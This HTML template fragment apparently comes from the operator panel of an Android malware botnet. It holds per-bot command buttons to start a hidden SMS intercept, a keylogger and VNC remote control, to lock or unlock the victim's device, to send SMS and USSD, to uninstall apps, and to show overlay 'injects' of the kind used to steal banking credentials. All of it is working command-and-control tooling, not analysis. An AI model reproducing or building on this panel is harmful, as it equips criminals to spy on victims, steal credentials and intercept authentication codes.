
<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=send_sms' title='Send SMS from the bot'><button class='btn btn-sm btn-warning'>Send SMS</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=ussd' title='Send USSD to the bot'><button class='btn btn-sm btn-success'>Send USSD</button></a>

<!--
<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=repeat_inject' title='Repeat inject on the bot'><button class='btn btn-sm btn-brown'>Repeat&nbsp;Inject</button></a>
-->

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=push'><button class='btn btn-sm btn-magenta' title='Send push notification'>Push notification</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=open_url'><button class='btn btn-sm btn-success' title='Open URL'>Open URL</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=run_app'><button class='btn btn-sm btn-default' title='Run app by package name'>Run app</button></a>

<hr />

<button id="lock_device_off" title="Device Admin is required" class='btn btn-sm btn-info disabled'><i class="flaticon-vintage-key-outline" style="color: white"></i> Lock</button>

<span id="lock_device">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=lock' title='Lock device (screen/sound/password)'><button class='btn btn-sm btn-info'><i class="flaticon-vintage-key-outline" style="color: white"></i> Lock</button></a>
</span>

<span id="unlock_device">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=unlock' title='Unlock device (screen/sound/password)'><button class='btn btn-sm btn-danger'><i class="flaticon-vintage-key-outline" style="color: white"></i> Unlock</button></a>
</span>


<span id="start_sms_intercept">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=start_intercept'><button class='btn btn-sm btn-info' title='Start Hidden SMS Intercept'>Start SMS Intercept</button></a>
</span>

<span id="stop_sms_intercept">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_intercept'><button class='btn btn-sm btn-danger' title='Stop Hidden SMS Intercept'>Stop SMS Intercept</button></a>
</span>

<hr style="display:none" id="mass_delim" />

<span id="start_fg">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=start_fg'><button class='btn btn-sm btn-warning' title='Start Antisleep'>Start Antisleep</button></a>
</span>

<span id="stop_fg">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_fg'><button class='btn btn-sm btn-danger' title='Stop Antisleep'>Stop Antisleep</button></a>
</span>

<span id="start_vnc">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=start_vnc'><button class='btn btn-sm btn-primary' title='Start VNC'>Start VNC</button></a>
</span>

<span id="stop_vnc">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_vnc'><button class='btn btn-sm btn-danger' title='Stop VNC'>Stop VNC</button></a>
</span>

<hr />

<span id="start_keylogger">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=start_keylogger'><button class='btn btn-sm btn-info' title='Start keylogger'>Start keylogger</button></a>
</span>

<span id="stop_keylogger">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_keylogger'><button class='btn btn-sm btn-danger' title='Stop keylogger'>Stop keylogger</button></a>
</span>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=uninstall_apps'><button class='btn btn-sm btn-primary' title='Uninstall apps by list'>Uninstall apps</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=kill_bot' onclick='return confirm("Are you sure?")'><button class='btn btn-sm btn-brown' title='Remove bot from device'>Kill bot</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=show_inject'><button class='btn btn-sm btn-default' title='Show inject on the bot'>Show inject</button></a>



<script>%VISIBILITY%</script>



